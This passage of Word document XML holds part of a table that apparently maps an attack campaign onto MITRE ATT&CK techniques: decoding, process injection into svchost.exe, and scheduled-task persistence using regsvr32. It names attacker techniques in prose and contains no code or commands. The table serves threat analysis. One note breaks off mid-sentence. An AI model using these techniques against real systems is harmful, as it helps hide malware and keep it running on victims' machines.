            </w:pPr>
            <w:r w:rsidRPr="00630876">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37997217" w14:textId="47FC307C" w:rsidR="00CF725C" w:rsidRPr="00AB2DC0" w:rsidRDefault="001749E8" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[5] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA59DC" w:rsidRPr="00BA59DC" w14:paraId="6946C9C5" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D03B48C" w14:textId="1B17B3A9" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00FA3A2F" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32321CD4" w14:textId="358170B6" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00BA59DC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4788ACCF" w14:textId="784492E3" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00BA59DC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="615A5917" w14:textId="79C40E97" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00BA59DC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6218A3AA" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="664BA891" w14:textId="7170BEFF" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00BA59DC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F8EAD85" w14:textId="26D61302" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00BA59DC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4740CE76" w14:textId="77506F7A" w:rsidR="00F860E6" w:rsidRPr="00BA59DC" w:rsidRDefault="00F860E6" w:rsidP="00F860E6">
            <w:r w:rsidRPr="00BA59DC">
              <w:t>[5] The loader will decrypt the data and inject the malware in an instance of svchost.exe.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA3C845" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00BA59DC" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21C3A" w:rsidRPr="008C1E53" w14:paraId="2C084B09" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08D4E017" w14:textId="55337601" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C1E53">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A59A49" w14:textId="39E8A0B1" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BA59DC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="111CCABF" w14:textId="2953C2D8" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1055 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="189ACE44" w14:textId="0D66AE44" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E7C81F" w14:textId="77777777" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F4F054" w14:textId="4D808431" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AB4A0A7" w14:textId="2F36B164" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E841436" w14:textId="13D3122F" w:rsidR="008C1E53" w:rsidRPr="008C1E53" w:rsidRDefault="008C1E53" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C1E53">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[5] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C21C3A" w:rsidRPr="009D0705" w14:paraId="4786F081" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45392A55" w14:textId="474A9A1E" w:rsidR="00BA59DC" w:rsidRPr="009D0705" w:rsidRDefault="009D0705" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009D0705">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D19D2A6" w14:textId="5392EE1E" w:rsidR="00BA59DC" w:rsidRPr="009D0705" w:rsidRDefault="009D0705" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B306FE" w14:textId="0F6CFDD7" w:rsidR="00BA59DC" w:rsidRPr="009D0705" w:rsidRDefault="009D0705" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009D0705">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1053</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="009D0705">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scheduled Task/Job</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>&gt;:Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49200C33" w14:textId="6352E01E" w:rsidR="00BA59DC" w:rsidRPr="009D0705" w:rsidRDefault="009D0705" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D80D6C4" w14:textId="77777777" w:rsidR="00BA59DC" w:rsidRPr="009D0705" w:rsidRDefault="00BA59DC" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02BC2008" w14:textId="46C5C48C" w:rsidR="00BA59DC" w:rsidRPr="009D0705" w:rsidRDefault="009D0705" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06258C15" w14:textId="6E48B3B2" w:rsidR="00BA59DC" w:rsidRPr="009D0705" w:rsidRDefault="009D0705" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="697BA572" w14:textId="1413AC44" w:rsidR="00BA59DC" w:rsidRPr="00C21C3A" w:rsidRDefault="009D0705" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C21C3A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] Shows example of persistence by adding regsrvr32.exe run of the downloaded binaries now on target’s disc. It is unclear where this is done so assume at this point. It is possible that a couple of attack approaches have been blended/reported here</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w14:paraId="16C74A40" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B66952E" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4975D3C9" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="484AAA33" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73703ABE" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="338A9185" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65FD76F4" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47C94E19" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10C5FEA9" w14:textId="0AEB4866" w:rsidR="00AB2DC0" w:rsidRPr="00830EF4" w:rsidRDefault="00830EF4" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The reports here are unclear what the attacker did once they have achieved initial access so </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w14:paraId="07E84361" w14:textId="77777777" w:rsidTr="00C21C3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E1323C9" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F50AB11" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2855" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44BF64DF" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D8D939A" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B647DEC" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRPr="00B857D7" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193F8DB2" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362B99AA" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41B2EAD8" w14:textId="77777777" w:rsidR="00AB2DC0" w:rsidRDefault="00AB2DC0" w:rsidP="00AE6A0F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
